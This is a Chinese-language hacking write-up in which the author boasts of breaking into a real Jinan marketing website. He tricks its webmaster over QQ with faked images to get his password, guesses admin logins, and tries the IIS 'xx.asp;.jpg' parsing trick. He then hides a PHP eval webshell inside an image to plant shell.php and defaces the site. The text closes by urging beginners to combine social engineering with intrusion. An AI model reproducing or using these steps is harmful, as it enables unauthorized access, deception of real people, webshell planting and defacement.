大家好我是N。QQ350701557我是慕名而来加入伦叔舰队的人。伦叔.docVIP

大家好我是N。QQ350701557 我是慕名而来加入伦叔舰队的人。 伦叔以前冒犯你的您大人有大量别和我计较。 进入主题了 文章的目标是/ 是一个济南的软文营销网，相当有难度 首先我的思路就是拿起御剑扫扫看有什么发现没。 日站时喜欢把后台路径收集起来。所以我字典狠强大 晕死。还有认证码我最讨厌就是他了。只能社工了。 首先一定是找找站长的QQ 拿到客服给的QQ号我加了站长。顺便和他聊了几句 首先我的思路就是问他是不是这个站的站长否则你就算社出他的常用密码也不对的 确定他是这个站的站长就好办了。。。。。。。。嘿嘿 其实这2个图片是我做假的。这个站长还真好骗。骗了DK拿他的密码试试看是不是网站里面的后台密码认证码嘿嘿，我聪明吧。。。。。继续吧 又有这个东西。。。。看来他的常用账号就是beiwww或者beiwww123密码也是一样 操，错误在来试试 不知道大家发现了没有，上一个图片是显示错误账号，这个是显示错误认证码。看来认证码不对。换一个组合试试 进去了，好激动 上传不了，我们用iis7.0解析后缀漏洞试试xx.asp;.jpg 就是这样试试上传吧 看来已经被限制了 换一种上传方法 将一张图和一个写入后门代码的文本文件合并 将恶意文本写入图片的二进制代码之后，避免破坏图片文件头和尾 这是我准备好的图片 这个是我准备好了的一句话 把他们放在C:\Documents and Settings\Administrator这个目录里面然后打开CMD 回车 然后会在C:\Documents and Settings\Administrator这个目录里面生成一个1.jpg的图片。 打开看是一张正常的图片其实他里面有我们的一句话 这个一句话的意思是为写入一个内容为 ?php eval($_POST[cmd])? 名称为shell.php的文件 然后找个地方上传 1.jpg ,然后找到 1.jpg 的地址，在地址后加上 /xx.php 即可执行恶意文本。就在图片目录下生成一句话木马 shell.php 密码 cmd 我们来试试 上传成功了。  挂页面装逼走人，你懂的 最后在来总结一下：当你渗透网站时没有他的后台账号密码你一定想去花费狠大力气去找他的注入，你花这些时间应该足够去社到后台密码。当然这也需要社工的基础你要啥都不会那我不建议你用我这条方法。这就是社工与渗透的结合。。。。。。。 菜鸟们么事多学学社工肯定有益的。不光是用在渗透上，在事业上也是能够使用滴。